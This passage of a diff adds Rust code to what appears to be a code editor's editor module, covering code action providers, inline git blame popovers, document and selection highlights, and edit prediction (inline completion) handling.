.edited_ranges_for_transaction::(transaction) + .collect::>(); + let (ranges, _) = multibuffer.set_excerpts_for_path( + PathKey::for_buffer(buffer_handle, cx), + buffer_handle.clone(), + edited_ranges, + DEFAULT_MULTIBUFFER_CONTEXT, + cx, + ); + + ranges_to_highlight.extend(ranges); + } + multibuffer.push_transaction(entries.iter().map(|(b, t)| (b, t)), cx); + multibuffer + })?; + + workspace.update_in(cx, |workspace, window, cx| { + let project = workspace.project().clone(); + let editor = + cx.new(|cx| Editor::for_multibuffer(excerpt_buffer, Some(project), window, cx)); + workspace.add_item_to_active_pane(Box::new(editor.clone()), None, true, window, cx); + editor.update(cx, |editor, cx| { + editor.highlight_background::( + &ranges_to_highlight, + |theme| theme.editor_highlighted_line_background, + cx, + ); + }); + })?; + + Ok(()) + } + + pub fn clear_code_action_providers(&mut self) { + self.code_action_providers.clear(); + self.available_code_actions.take(); + } + + pub fn add_code_action_provider( + &mut self, + provider: Rc, + window: &mut Window, + cx: &mut Context, + ) { + if self + .code_action_providers + .iter() + .any(|existing_provider| existing_provider.id() == provider.id()) + { + return; + } + + self.code_action_providers.push(provider); + self.refresh_code_actions(window, cx); + } + + pub fn remove_code_action_provider( + &mut self, + id: Arc, + window: &mut Window, + cx: &mut Context, + ) { + self.code_action_providers + .retain(|provider| provider.id() != id); + self.refresh_code_actions(window, cx); + } + + fn refresh_code_actions(&mut self, window: &mut Window, cx: &mut Context) -> Option<()> { + let newest_selection = self.selections.newest_anchor().clone(); + let newest_selection_adjusted = self.selections.newest_adjusted(cx).clone(); + let buffer = self.buffer.read(cx); + if newest_selection.head().diff_base_anchor.is_some() { + return None; + } + let (start_buffer, start) = + buffer.text_anchor_for_position(newest_selection_adjusted.start, cx)?; + let (end_buffer, end) = + buffer.text_anchor_for_position(newest_selection_adjusted.end, cx)?; + if start_buffer != end_buffer { + return None; + } + + self.code_actions_task = Some(cx.spawn_in(window, async move |this, cx| { + cx.background_executor() + .timer(CODE_ACTIONS_DEBOUNCE_TIMEOUT) + .await; + + let (providers, tasks) = this.update_in(cx, |this, window, cx| { + let providers = this.code_action_providers.clone(); + let tasks = this + .code_action_providers + .iter() + .map(|provider| provider.code_actions(&start_buffer, start..end, window, cx)) + .collect::>(); + (providers, tasks) + })?; + + let mut actions = Vec::new(); + for (provider, provider_actions) in + providers.into_iter().zip(future::join_all(tasks).await) + { + if let Some(provider_actions) = provider_actions.log_err() { + actions.extend(provider_actions.into_iter().map(|action| { + AvailableCodeAction { + excerpt_id: newest_selection.start.excerpt_id, + action, + provider: provider.clone(), + } + })); + } + } + + this.update(cx, |this, cx| { + this.available_code_actions = if actions.is_empty() { + None + } else { + Some(( + Location { + buffer: start_buffer, + range: start..end, + }, + actions.into(), + )) + }; + cx.notify(); + }) + })); + None + } + + fn start_inline_blame_timer(&mut self, window: &mut Window, cx: &mut Context) { + if let Some(delay) = ProjectSettings::get_global(cx).git.inline_blame_delay() { + self.show_git_blame_inline = false; + + self.show_git_blame_inline_delay_task = + Some(cx.spawn_in(window, async move |this, cx| { + cx.background_executor().timer(delay).await; + + this.update(cx, |this, cx| { + this.show_git_blame_inline = true; + cx.notify(); + }) + .log_err(); + })); + } + } + + fn show_blame_popover( + &mut self, + blame_entry: &BlameEntry, + position: gpui::Point, + cx: &mut Context, + ) { + if let Some(state) = &mut self.inline_blame_popover { + state.hide_task.take(); + cx.notify(); + } else { + let delay = EditorSettings::get_global(cx).hover_popover_delay; + let show_task = cx.spawn(async move |editor, cx| { + cx.background_executor() + .timer(std::time::Duration::from_millis(delay)) + .await; + editor + .update(cx, |editor, cx| { + if let Some(state) = &mut editor.inline_blame_popover { + state.show_task = None; + cx.notify(); + } + }) + .ok(); + }); + let Some(blame) = self.blame.as_ref() else { + return; + }; + let blame = blame.read(cx); + let details = blame.details_for_entry(&blame_entry); + let markdown = cx.new(|cx| { + Markdown::new( + details + .as_ref() + .map(|message| message.message.clone()) + .unwrap_or_default(), + None, + None, + cx, + ) + }); + self.inline_blame_popover = Some(InlineBlamePopover { + position, + show_task: Some(show_task), + hide_task: None, + popover_bounds: None, + popover_state: InlineBlamePopoverState { + scroll_handle: ScrollHandle::new(), + commit_message: details, + markdown, + }, + }); + } + } + + fn hide_blame_popover(&mut self, cx: &mut Context) { + if let Some(state) = &mut self.inline_blame_popover { + if state.show_task.is_some() { + self.inline_blame_popover.take(); + cx.notify(); + } else { + let hide_task = cx.spawn(async move |editor, cx| { + cx.background_executor() + .timer(std::time::Duration::from_millis(100)) + .await; + editor + .update(cx, |editor, cx| { + editor.inline_blame_popover.take(); + cx.notify(); + }) + .ok(); + }); + state.hide_task = Some(hide_task); + } + } + } + + fn refresh_document_highlights(&mut self, cx: &mut Context) -> Option<()> { + if self.pending_rename.is_some() { + return None; + } + + let provider = self.semantics_provider.clone()?; + let buffer = self.buffer.read(cx); + let newest_selection = self.selections.newest_anchor().clone(); + let cursor_position = newest_selection.head(); + let (cursor_buffer, cursor_buffer_position) = + buffer.text_anchor_for_position(cursor_position, cx)?; + let (tail_buffer, _) = buffer.text_anchor_for_position(newest_selection.tail(), cx)?; + if cursor_buffer != tail_buffer { + return None; + } + let debounce = EditorSettings::get_global(cx).lsp_highlight_debounce; + self.document_highlights_task = Some(cx.spawn(async move |this, cx| { + cx.background_executor() + .timer(Duration::from_millis(debounce)) + .await; + + let highlights = if let Some(highlights) = cx + .update(|cx| { + provider.document_highlights(&cursor_buffer, cursor_buffer_position, cx) + }) + .ok() + .flatten() + { + highlights.await.log_err() + } else { + None + }; + + if let Some(highlights) = highlights { + this.update(cx, |this, cx| { + if this.pending_rename.is_some() { + return; + } + + let buffer_id = cursor_position.buffer_id; + let buffer = this.buffer.read(cx); + if !buffer + .text_anchor_for_position(cursor_position, cx) + .map_or(false, |(buffer, _)| buffer == cursor_buffer) + { + return; + } + + let cursor_buffer_snapshot = cursor_buffer.read(cx); + let mut write_ranges = Vec::new(); + let mut read_ranges = Vec::new(); + for highlight in highlights { + for (excerpt_id, excerpt_range) in + buffer.excerpts_for_buffer(cursor_buffer.read(cx).remote_id(), cx) + { + let start = highlight + .range + .start + .max(&excerpt_range.context.start, cursor_buffer_snapshot); + let end = highlight + .range + .end + .min(&excerpt_range.context.end, cursor_buffer_snapshot); + if start.cmp(&end, cursor_buffer_snapshot).is_ge() { + continue; + } + + let range = Anchor { + buffer_id, + excerpt_id, + text_anchor: start, + diff_base_anchor: None, + }..Anchor { + buffer_id, + excerpt_id, + text_anchor: end, + diff_base_anchor: None, + }; + if highlight.kind == lsp::DocumentHighlightKind::WRITE { + write_ranges.push(range); + } else { + read_ranges.push(range); + } + } + } + + this.highlight_background::( + &read_ranges, + |theme| theme.editor_document_highlight_read_background, + cx, + ); + this.highlight_background::( + &write_ranges, + |theme| theme.editor_document_highlight_write_background, + cx, + ); + cx.notify(); + }) + .log_err(); + } + })); + None + } + + fn prepare_highlight_query_from_selection( + &mut self, + cx: &mut Context, + ) -> Option<(String, Range)> { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + return None; + } + if !EditorSettings::get_global(cx).selection_highlight { + return None; + } + if self.selections.count() != 1 || self.selections.line_mode { + return None; + } + let selection = self.selections.newest::(cx); + if selection.is_empty() || selection.start.row != selection.end.row { + return None; + } + let multi_buffer_snapshot = self.buffer().read(cx).snapshot(cx); + let selection_anchor_range = selection.range().to_anchors(&multi_buffer_snapshot); + let query = multi_buffer_snapshot + .text_for_range(selection_anchor_range.clone()) + .collect::(); + if query.trim().is_empty() { + return None; + } + Some((query, selection_anchor_range)) + } + + fn update_selection_occurrence_highlights( + &mut self, + query_text: String, + query_range: Range, + multi_buffer_range_to_query: Range, + use_debounce: bool, + window: &mut Window, + cx: &mut Context, + ) -> Task<()> { + let multi_buffer_snapshot = self.buffer().read(cx).snapshot(cx); + cx.spawn_in(window, async move |editor, cx| { + if use_debounce { + cx.background_executor() + .timer(SELECTION_HIGHLIGHT_DEBOUNCE_TIMEOUT) + .await; + } + let match_task = cx.background_spawn(async move { + let buffer_ranges = multi_buffer_snapshot + .range_to_buffer_ranges(multi_buffer_range_to_query) + .into_iter() + .filter(|(_, excerpt_visible_range, _)| !excerpt_visible_range.is_empty()); + let mut match_ranges = Vec::new(); + for (buffer_snapshot, search_range, excerpt_id) in buffer_ranges { + match_ranges.extend( + project::search::SearchQuery::text( + query_text.clone(), + false, + false, + false, + Default::default(), + Default::default(), + false, + None, + ) + .unwrap() + .search(&buffer_snapshot, Some(search_range.clone())) + .await + .into_iter() + .filter_map(|match_range| { + let match_start = buffer_snapshot + .anchor_after(search_range.start + match_range.start); + let match_end = + buffer_snapshot.anchor_before(search_range.start + match_range.end); + let match_anchor_range = Anchor::range_in_buffer( + excerpt_id, + buffer_snapshot.remote_id(), + match_start..match_end, + ); + (match_anchor_range != query_range).then_some(match_anchor_range) + }), + ); + } + match_ranges + }); + let match_ranges = match_task.await; + editor + .update_in(cx, |editor, _, cx| { + editor.clear_background_highlights::(cx); + if !match_ranges.is_empty() { + editor.highlight_background::( + &match_ranges, + |theme| theme.editor_document_highlight_bracket_background, + cx, + ) + } + }) + .log_err(); + }) + } + + fn refresh_selected_text_highlights( + &mut self, + on_buffer_edit: bool, + window: &mut Window, + cx: &mut Context, + ) { + let Some((query_text, query_range)) = self.prepare_highlight_query_from_selection(cx) + else { + self.clear_background_highlights::(cx); + self.quick_selection_highlight_task.take(); + self.debounced_selection_highlight_task.take(); + return; + }; + let multi_buffer_snapshot = self.buffer().read(cx).snapshot(cx); + if on_buffer_edit + || self + .quick_selection_highlight_task + .as_ref() + .map_or(true, |(prev_anchor_range, _)| { + prev_anchor_range != &query_range + }) + { + let multi_buffer_visible_start = self + .scroll_manager + .anchor() + .anchor + .to_point(&multi_buffer_snapshot); + let multi_buffer_visible_end = multi_buffer_snapshot.clip_point( + multi_buffer_visible_start + + Point::new(self.visible_line_count().unwrap_or(0.).ceil() as u32, 0), + Bias::Left, + ); + let multi_buffer_visible_range = multi_buffer_visible_start..multi_buffer_visible_end; + self.quick_selection_highlight_task = Some(( + query_range.clone(), + self.update_selection_occurrence_highlights( + query_text.clone(), + query_range.clone(), + multi_buffer_visible_range, + false, + window, + cx, + ), + )); + } + if on_buffer_edit + || self + .debounced_selection_highlight_task + .as_ref() + .map_or(true, |(prev_anchor_range, _)| { + prev_anchor_range != &query_range + }) + { + let multi_buffer_start = multi_buffer_snapshot + .anchor_before(0) + .to_point(&multi_buffer_snapshot); + let multi_buffer_end = multi_buffer_snapshot + .anchor_after(multi_buffer_snapshot.len()) + .to_point(&multi_buffer_snapshot); + let multi_buffer_full_range = multi_buffer_start..multi_buffer_end; + self.debounced_selection_highlight_task = Some(( + query_range.clone(), + self.update_selection_occurrence_highlights( + query_text, + query_range, + multi_buffer_full_range, + true, + window, + cx, + ), + )); + } + } + + pub fn refresh_inline_completion( + &mut self, + debounce: bool, + user_requested: bool, + window: &mut Window, + cx: &mut Context, + ) -> Option<()> { + let provider = self.edit_prediction_provider()?; + let cursor = self.selections.newest_anchor().head(); + let (buffer, cursor_buffer_position) = + self.buffer.read(cx).text_anchor_for_position(cursor, cx)?; + + if !self.edit_predictions_enabled_in_buffer(&buffer, cursor_buffer_position, cx) { + self.discard_inline_completion(false, cx); + return None; + } + + if !user_requested + && (!self.should_show_edit_predictions() + || !self.is_focused(window) + || buffer.read(cx).is_empty()) + { + self.discard_inline_completion(false, cx); + return None; + } + + self.update_visible_inline_completion(window, cx); + provider.refresh( + self.project.clone(), + buffer, + cursor_buffer_position, + debounce, + cx, + ); + Some(()) + } + + fn show_edit_predictions_in_menu(&self) -> bool { + match self.edit_prediction_settings { + EditPredictionSettings::Disabled => false, + EditPredictionSettings::Enabled { show_in_menu, .. } => show_in_menu, + } + } + + pub fn edit_predictions_enabled(&self) -> bool { + match self.edit_prediction_settings { + EditPredictionSettings::Disabled => false, + EditPredictionSettings::Enabled { .. } => true, + } + } + + fn edit_prediction_requires_modifier(&self) -> bool { + match self.edit_prediction_settings { + EditPredictionSettings::Disabled => false, + EditPredictionSettings::Enabled { + preview_requires_modifier, + .. + } => preview_requires_modifier, + } + } + + pub fn update_edit_prediction_settings(&mut self, cx: &mut Context) { + if self.edit_prediction_provider.is_none() { + self.edit_prediction_settings = EditPredictionSettings::Disabled; + } else { + let selection = self.selections.newest_anchor(); + let cursor = selection.head(); + + if let Some((buffer, cursor_buffer_position)) = + self.buffer.read(cx).text_anchor_for_position(cursor, cx) + { + self.edit_prediction_settings = + self.edit_prediction_settings_at_position(&buffer, cursor_buffer_position, cx); + } + } + } + + fn edit_prediction_settings_at_position( + &self, + buffer: &Entity, + buffer_position: language::Anchor, + cx: &App, + ) -> EditPredictionSettings { + if !self.mode.is_full() + || !self.show_inline_completions_override.unwrap_or(true) + || self.inline_completions_disabled_in_scope(buffer, buffer_position, cx) + { + return EditPredictionSettings::Disabled; + } + + let buffer = buffer.read(cx); + + let file = buffer.file(); + + if !language_settings(buffer.language().map(|l| l.name()), file, cx).show_edit_predictions { + return EditPredictionSettings::Disabled; + }; + + let by_provider = matches!( + self.menu_inline_completions_policy, + MenuInlineCompletionsPolicy::ByProvider + ); + + let show_in_menu = by_provider + && self + .edit_prediction_provider + .as_ref() + .map_or(false, |provider| { + provider.provider.show_completions_in_menu() + }); + + let preview_requires_modifier = + all_language_settings(file, cx).edit_predictions_mode() == EditPredictionsMode::Subtle; + + EditPredictionSettings::Enabled { + show_in_menu, + preview_requires_modifier, + } + } + + fn should_show_edit_predictions(&self) -> bool { + self.snippet_stack.is_empty() && self.edit_predictions_enabled() + } + + pub fn edit_prediction_preview_is_active(&self) -> bool { + matches!( + self.edit_prediction_preview, + EditPredictionPreview::Active { .. } + ) + } + + pub fn edit_predictions_enabled_at_cursor(&self, cx: &App) -> bool { + let cursor = self.selections.newest_anchor().head(); + if let Some((buffer, cursor_position)) = + self.buffer.read(cx).text_anchor_for_position(cursor, cx) + { + self.edit_predictions_enabled_in_buffer(&buffer, cursor_position, cx) + } else { + false + } + } + + fn edit_predictions_enabled_in_buffer( + &self, + buffer: &Entity, + buffer_position: language::Anchor, + cx: &App, + ) -> bool { + maybe!({ + if self.read_only(cx) { + return Some(false); + } + let provider = self.edit_prediction_provider()?; + if !provider.is_enabled(&buffer, buffer_position, cx) { + return Some(false); + } + let buffer = buffer.read(cx); + let Some(file) = buffer.file() else { + return Some(true); + }; + let settings = all_language_settings(Some(file), cx); + Some(settings.edit_predictions_enabled_for_file(file, cx)) + }) + .unwrap_or(false) + } + + fn cycle_inline_completion( + &mut self, + direction: Direction, + window: &mut Window, + cx: &mut Context, + ) -> Option<()> { + let provider = self.edit_prediction_provider()?; + let cursor = self.selections.newest_anchor().head(); + let (buffer, cursor_buffer_position) = + self.buffer.read(cx).text_anchor_for_position(cursor, cx)?; + if self.inline_completions_hidden_for_vim_mode || !self.should_show_edit_predictions() { + return None; + } + + provider.cycle(buffer, cursor_buffer_position, direction, cx); + self.update_visible_inline_completion(window, cx); + + Some(()) + } + + pub fn show_inline_completion( + &mut self, + _: &ShowEditPrediction, + window: &mut Window, + cx: &mut Context, + ) { + if !self.has_active_inline_completion() { + self.refresh_inline_completion(false, true, window, cx); + return; + } + + self.update_visible_inline_completion(window, cx); + } + + pub fn display_cursor_names( + &mut self, + _: &DisplayCursorNames, + window: &mut Window, + cx: &mut Context, + ) { + self.show_cursor_names(window, cx); + } + + fn show_cursor_names(&mut self, window: &mut Window, cx: &mut Context) { + self.show_cursor_names = true; + cx.notify(); + cx.spawn_in(window, async move |this, cx| { + cx.background_executor().timer(CURSORS_VISIBLE_FOR).await; + this.update(cx, |this, cx| { + this.show_cursor_names = false; + cx.notify() + }) + .ok() + }) + .detach(); + } + + pub fn next_edit_prediction( + &mut self, + _: &NextEditPrediction, + window: &mut Window, + cx: &mut Context, + ) { + if self.has_active_inline_completion() { + self.cycle_inline_completion(Direction::Next, window, cx); + } else { + let is_copilot_disabled = self + .refresh_inline_completion(false, true, window, cx) + .is_none(); + if is_copilot_disabled { + cx.propagate(); + } + } + } + + pub fn previous_edit_prediction( + &mut self, + _: &PreviousEditPrediction, + window: &mut Window, + cx: &mut Context, + ) { + if self.has_active_inline_completion() { + self.cycle_inline_completion(Direction::Prev, window, cx); + } else { + let is_copilot_disabled = self + .refresh_inline_completion(false, true, window, cx) + .is_none(); + if is_copilot_disabled { + cx.propagate(); + } + } + } + + pub fn accept_edit_prediction( + &mut self, + _: &AcceptEditPrediction, + window: &mut Window, + cx: &mut Context, + ) { + if self.show_edit_predictions_in_menu() { + self.hide_context_menu(window, cx); + } + + let Some(active_inline_completion) = self.active_inline_completion.as_ref() else { + return; + }; + + self.report_inline_completion_event( + active_inline_completion.completion_id.clone(), + true, + cx, + ); + + match &active_inline_completion.completion { + InlineCompletion::Move { target, .. } => { + let target = *target; + + if let Some(position_map) = &self.last_position_map { + if position_map + .visible_row_range + .contains(&target.to_display_point(&position_map.snapshot).row()) + || !self.edit_prediction_requires_modifier() + { + self.unfold_ranges(&[target..target], true, false, cx); + // Note that this is also done in vim's handler of the Tab action. + self.change_selections( + Some(Autoscroll::newest()), + window, + cx, + |selections| { + selections.select_anchor_ranges([target..target]); + }, + ); + self.clear_row_highlights::(); + + self.edit_prediction_preview + .set_previous_scroll_position(None); + } else { + self.edit_prediction_preview + .set_previous_scroll_position(Some( + position_map.snapshot.scroll_anchor, + )); + + self.highlight_rows::( + target..target, + cx.theme().colors().editor_highlighted_line_background, + RowHighlightOptions { + autoscroll: true, + ..Default::default() + }, + cx, + ); + self.request_autoscroll(Autoscroll::fit(), cx); + } + } + } + InlineCompletion::Edit { edits, .. } => { + if let Some(provider) = self.edit_prediction_provider() { + provider.accept(cx); + } + + let snapshot = self.buffer.read(cx).snapshot(cx); + let last_edit_end = edits.last().unwrap().0.end.bias_right(&snapshot); + + self.buffer.update(cx, |buffer, cx| { + buffer.edit(edits.iter().cloned(), None, cx) + }); + + self.change_selections(None, window, cx, |s| { + s.select_anchor_ranges([last_edit_end..last_edit_end]) + }); + + self.update_visible_inline_completion(window, cx); + if self.active_inline_completion.is_none() { + self.refresh_inline_completion(true, true, window, cx); + } + + cx.notify(); + } + } + + self.edit_prediction_requires_modifier_in_indent_conflict = false; + } + + pub fn accept_partial_inline_completion( + &mut self, + _: &AcceptPartialEditPrediction, + window: &mut Window, + cx: &mut Context, + ) { + let Some(active_inline_completion) = self.active_inline_completion.as_ref() else { + return; + }; + if self.selections.count() != 1 { + return; + } + + self.report_inline_completion_event( + active_inline_completion.completion_id.clone(), + true, + cx, + ); + + match &active_inline_completion.completion { + InlineCompletion::Move { target, .. } => { + let target = *target; + self.change_selections(Some(Autoscroll::newest()), window, cx, |selections| { + selections.select_anchor_ranges([target..target]); + }); + } + InlineCompletion::Edit { edits, .. } => { + // Find an insertion that starts at the cursor position. + let snapshot = self.buffer.read(cx).snapshot(cx); + let cursor_offset = self.selections.newest::(cx).head(); + let insertion = edits.iter().find_map(|(range, text)| { + let range = range.to_offset(&snapshot); + if range.is_empty() && range.start == cursor_offset { + Some(text) + } else { + None + } + }); + + if let Some(text) = insertion { + let mut partial_completion = text + .chars() + .by_ref() + .take_while(|c| c.is_alphabetic()) + .collect::(); + if partial_completion.is_empty() { + partial_completion = text + .chars() + .by_ref() + .take_while(|c| c.is_whitespace() || !c.is_alphabetic()) + .collect::(); + } + + cx.emit(EditorEvent::InputHandled { + utf16_range_to_replace: None, + text: partial_completion.clone().into(), + }); + + self.insert_with_autoindent_mode(&partial_completion, None, window, cx); + + self.refresh_inline_completion(true, true, window, cx); + cx.notify(); + } else { + self.accept_edit_prediction(&Default::default(), window, cx); + } + } + } + } + + fn discard_inline_completion( + &mut self, + should_report_inline_completion_event: bool, + cx: &mut Context, + ) -> bool { + if should_report_inline_completion_event { + let completion_id = self + .active_inline_completion + .as_ref() + .and_then(|active_completion| active_completion.completion_id.clone()); + + self.report_inline_completion_event(completion_id, false, cx); + } + + if let Some(provider) = self.edit_prediction_provider() { + provider.discard(cx); + } + + self.take_active_inline_completion(cx) + } + + fn report_inline_completion_event(&self, id: Option, accepted: bool, cx: &App) { + let Some(provider) = self.edit_prediction_provider() else { + return; + }; + + let Some((_, buffer, _)) = self + .buffer + .read(cx) + .excerpt_containing(self.selections.newest_anchor().head(), cx) + else { + return; + }; + + let extension = buffer + .read(cx) + .file() + .and_then(|file| Some(file.path().extension()?.to_string_lossy().to_string())); + + let event_type = match accepted { + true => "Edit Prediction Accepted", + false => "Edit Prediction Discarded", + }; + telemetry::event!( + event_type, + provider = provider.name(), + prediction_id = id, + suggestion_accepted = accepted, + file_extension = extension, + ); + } + + pub fn has_active_inline_completion(&self) -> bool { + self.active_inline_completion.is_some() + } + + fn take_active_inline_completion(&mut self, cx: &mut Context) -> bool { + let Some(active_inline_completion) = self.active_inline_completion.take() else { + return false; + }; + + self.splice_inlays(&active_inline_completion.inlay_ids, Default::default(), cx); + self.clear_highlights::(cx); + self.stale_inline_completion_in_menu = Some(active_inline_completion); + true + } + + /// Returns true when we're displaying the edit prediction popover below the cursor + /// like we are not previewing and the LSP autocomplete menu is visible + /// or we are in `when_holding_modifier` mode. + pub fn edit_prediction_visible_in_cursor_popover(&self, has_completion: bool) -> bool { + if self.edit_prediction_preview_is_active() + || !self.show_edit_predictions_in_menu() + || !self.edit_predictions_enabled() + { + return false; + } + + if self.has_visible_completions_menu() { + return true; + } + + has_completion && self.edit_prediction_requires_modifier() + } + + fn handle_modifiers_changed( + &mut self, + modifiers: Modifiers, + position_map: &PositionMap, + window: &mut Window, + cx: &mut Context, + ) { + if self.show_edit_predictions_in_menu() { + self.update_edit_prediction_preview(&modifiers, window, cx); + } + + self.update_selection_mode(&modifiers, position_map, window, cx); + + let mouse_position = window.mouse_position(); + if !position_map.text_hitbox.is_hovered(window) { + return; + } + + self.update_hovered_link( + position_map.point_for_position(mouse_position), + &position_map.snapshot, + modifiers, + window, + cx, + ) + } + + fn update_selection_mode( + &mut self, + modifiers: &Modifiers, + position_map: &PositionMap, + window: &mut Window, + cx: &mut Context, + ) { + if modifiers != &COLUMNAR_SELECTION_MODIFIERS || self.selections.pending.is_none() { + return; + } + + let mouse_position = window.mouse_position(); + let point_for_position = position_map.point_for_position(mouse_position); + let position = point_for_position.previous_valid; + + self.select( + SelectPhase::BeginColumnar { + position, + reset: false, + goal_column: point_for_position.exact_unclipped.column(), + }, + window, + cx, + ); + } + + fn update_edit_prediction_preview( + &mut self, + modifiers: &Modifiers, + window: &mut Window, + cx: &mut Context, + ) { + let accept_keybind = self.accept_edit_prediction_keybind(window, cx); + let Some(accept_keystroke) = accept_keybind.keystroke() else { + return; + }; + + if &accept_keystroke.modifiers == modifiers && accept_keystroke.modifiers.modified() { + if matches!( + self.edit_prediction_preview, + EditPredictionPreview::Inactive { .. } + ) { + self.edit_prediction_preview = EditPredictionPreview::Active { + previous_scroll_position: None, + since: Instant::now(), + }; + + self.update_visible_inline_completion(window, cx); + cx.notify(); + } + } else if let EditPredictionPreview::Active { + previous_scroll_position, + since, + } = self.edit_prediction_preview + { + if let (Some(previous_scroll_position), Some(position_map)) = + (previous_scroll_position, self.last_position_map.as_ref()) + { + self.set_scroll_position( + previous_scroll_position + .scroll_position(&position_map.snapshot.display_snapshot), + window, + cx, + ); + } + + self.edit_prediction_preview = EditPredictionPreview::Inactive { + released_too_fast: since.elapsed() < Duration::from_millis(200), + }; + self.clear_row_highlights::(); + self.update_visible_inline_completion(window, cx); + cx.notify(); + } + } + + fn update_visible_inline_completion( + &mut self, + _window: &mut Window, + cx: &mut Context, + ) -> Option<()> { + let selection = self.selections.newest_anchor(); + let cursor = selection.head(); + let multibuffer = self.buffer.read(cx).snapshot(cx); + let offset_selection = selection.map(|endpoint| endpoint.to_offset(&multibuffer)); + let excerpt_id = cursor.excerpt_id; + + let show_in_menu = self.show_edit_predictions_in_menu(); + let completions_menu_has_precedence = !show_in_menu + && (self.context_menu.borrow().is_some() + || (!self.completion_tasks.is_empty() && !self.has_active_inline_completion())); + + if completions_menu_has_precedence + || !offset_selection.is_empty() + || self + .active_inline_completion + .as_ref() + .map_or(false, |completion| { + let invalidation_range = completion.invalidation_range.to_offset(&multibuffer); + let invalidation_range = invalidation_range.start..=invalidation_range.end; + !invalidation_range.contains(&offset_selection.head()) + }) + { + self.discard_inline_completion(false, cx); + return None; + } + + self.take_active_inline_completion(cx); + let Some(provider) = self.edit_prediction_provider() else { + self.edit_prediction_settings = EditPredictionSettings::Disabled; + return None; + }; + + let (buffer, cursor_buffer_position) = + self.buffer.read(cx).text_anchor_for_position(cursor, cx)?; + + self.edit_prediction_settings = + self.edit_prediction_settings_at_position(&buffer, cursor_buffer_position, cx); + + self.edit_prediction_indent_conflict = multibuffer.is_line_whitespace_upto(cursor); + + if self.edit_prediction_indent_conflict { + let cursor_point = cursor.to_point(&multibuffer); + + let indents = multibuffer.suggested_indents(cursor_point.row..cursor_point.row + 1, cx); + + if let Some((_, indent)) = indents.iter().next() { + if indent.len == cursor_point.column { + self.edit_prediction_indent_conflict = false; + } + } + } + + let inline_completion = provider.suggest(&buffer, cursor_buffer_position, cx)?; + let edits = inline_completion + .edits + .into_iter() + .flat_map(|(range, new_text)| { + let start = multibuffer.anchor_in_excerpt(excerpt_id, range.start)?; + let end = multibuffer.anchor_in_excerpt(excerpt_id, range.end)?; + Some((start..end, new_text)) + }) + .collect::>(); + if edits.is_empty() { + return None; + } + + let first_edit_start = edits.first().unwrap().0.start; + let first_edit_start_point = first_edit_start.to_point(&multibuffer); + let edit_start_row = first_edit_start_point.row.saturating_sub(2); + + let last_edit_end = edits.last().unwrap().0.end; + let last_edit_end_point = last_edit_end.to_point(&multibuffer); + let edit_end_row = cmp::min(multibuffer.max_point().row, last_edit_end_point.row + 2); + + let cursor_row = cursor.to_point(&multibuffer).row; + + let snapshot = multibuffer.buffer_for_excerpt(excerpt_id).cloned()?; + + let mut inlay_ids = Vec::new(); + let invalidation_row_range; + let move_invalidation_row_range = if cursor_row < edit_start_row { + Some(cursor_row..edit_end_row) + } else if cursor_row > edit_end_row { + Some(edit_start_row..cursor_row) + } else { + None + }; + let is_move = + move_invalidation_row_range.is_some() || self.inline_completions_hidden_for_vim_mode; + let completion = if is_move { + invalidation_row_range = + move_invalidation_row_range.unwrap_or(edit_start_row..edit_end_row); + let target = first_edit_start; + InlineCompletion::Move { target, snapshot } + } else { + let show_completions_in_buffer = !self.edit_prediction_visible_in_cursor_popover(true) + && !self.inline_completions_hidden_for_vim_mode; + + if show_completions_in_buffer { + if edits + .iter() + .all(|(range, _)| range.to_offset(&multibuffer).is_empty()) + { + let mut inlays = Vec::new(); + for (range, new_text) in &edits { + let inlay = Inlay::inline_completion( + post_inc(&mut self.next_inlay_id), + range.start, + new_text.as_str(), + ); + inlay_ids.push(inlay.id); + inlays.push(inlay); + } + + self.splice_inlays(&[], inlays, cx); + } else { + let background_color = cx.theme().status().deleted_background; + self.highlight_text::( + edits.iter().map(|(range, _)| range.clone()).collect(), + HighlightStyle { + background_color: Some(background_color), + ..Default::default() + }, + cx, + ); + } + } + + invalidation_row_range = edit_start_row..edit_end_row; + + let display_mode = if all_edits_insertions_or_deletions(&edits, &multibuffer) { + if provider.show_tab_accept_marker() { + EditDisplayMode::TabAccept + } else { + EditDisplayMode::Inline + } + } else { + EditDisplayMode::DiffPopover + }; + + InlineCompletion::Edit { + edits, + edit_preview: inline_completion.edit_preview, + display_mode, + snapshot, + } + }; + + let invalidation_range = multibuffer + .anchor_before(Point::new(invalidation_row_range.start, 0)) + ..multibuffer.anchor_after(Point::new( + invalidation_row_range.end, + multibuffer.line_len(MultiBufferRow(invalidation_row_range.end)), + )); + + self.stale_inline_completion_in_menu = None; + self.active_inline_completion = Some(InlineCompletionState { + inlay_ids, + completion, + completion_id: inline_completion.id, + invalidation_range, + }); + + cx.notify(); + + Some(()) + } + + pub fn edit_prediction_provider(&self) -> Option> { + Some(self.edit_prediction_provider.as_ref()?.provider.clone()) + } + + fn render_code_actions_indicator( + &self, + _style: &EditorStyle, + row: DisplayRow, + is_active: bool, + breakpoint: Option<&(Anchor, Breakpoint)>, + cx: &mut Context, + ) -> Option { + let color = Color::Muted; + let position = breakpoint.as_ref().map(|(anchor, _)| *anchor); + let show_tooltip = !self.context_menu_visible(); + + if self.available_code_actions.is_some() { + Some( + IconButton::new("code_actions_indicator", ui::IconName::Bolt) + .shape(ui::IconButtonShape::Square) + .icon_size(IconSize::XSmall) + .icon_color(color) + .toggle_state(is_active) + .when(show_tooltip, |this| { + this.tooltip({ + let focus_handle = self.focus_handle.clone(); + move |window, cx| { + Tooltip::for_action_in( + "Toggle Code Actions", + &ToggleCodeActions { + deployed_from_indicator: None, + quick_launch: false, + }, + &focus_handle, + window, + cx, + ) + } + }) + }) + .on_click(cx.listener(move |editor, e: &ClickEvent, window, cx| { + let quick_launch = e.down.button == MouseButton::Left; + window.focus(&editor.focus_handle(cx)); + editor.toggle_code_actions( + &ToggleCodeActions { + deployed_from_indicator: Some(row), + quick_launch, + }, + window, + cx, + ); + })) + .on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| { + editor.set_breakpoint_context_menu( + row, + position, + event.down.position, + window, + cx, + ); + })), + ) + } else { + None + } + } + + fn clear_tasks(&mut self) { + self.tasks.clear() + } + + fn insert_tasks(&mut self, key: (BufferId, BufferRow), value: RunnableTasks) { + if self.tasks.insert(key, value).is_some() { + // This case should hopefully be rare, but just in case... + log::error!( + "multiple different run targets found on a single line, only the last target will be rendered" + ) + } + } + + /// Get all display points of breakpoints that will be rendered within editor + /// + /// This function is used to handle overlaps between breakpoints and Code action/runner symbol. + /// It's also used to set the color of line numbers with breakpoints to the breakpoint color. + /// TODO 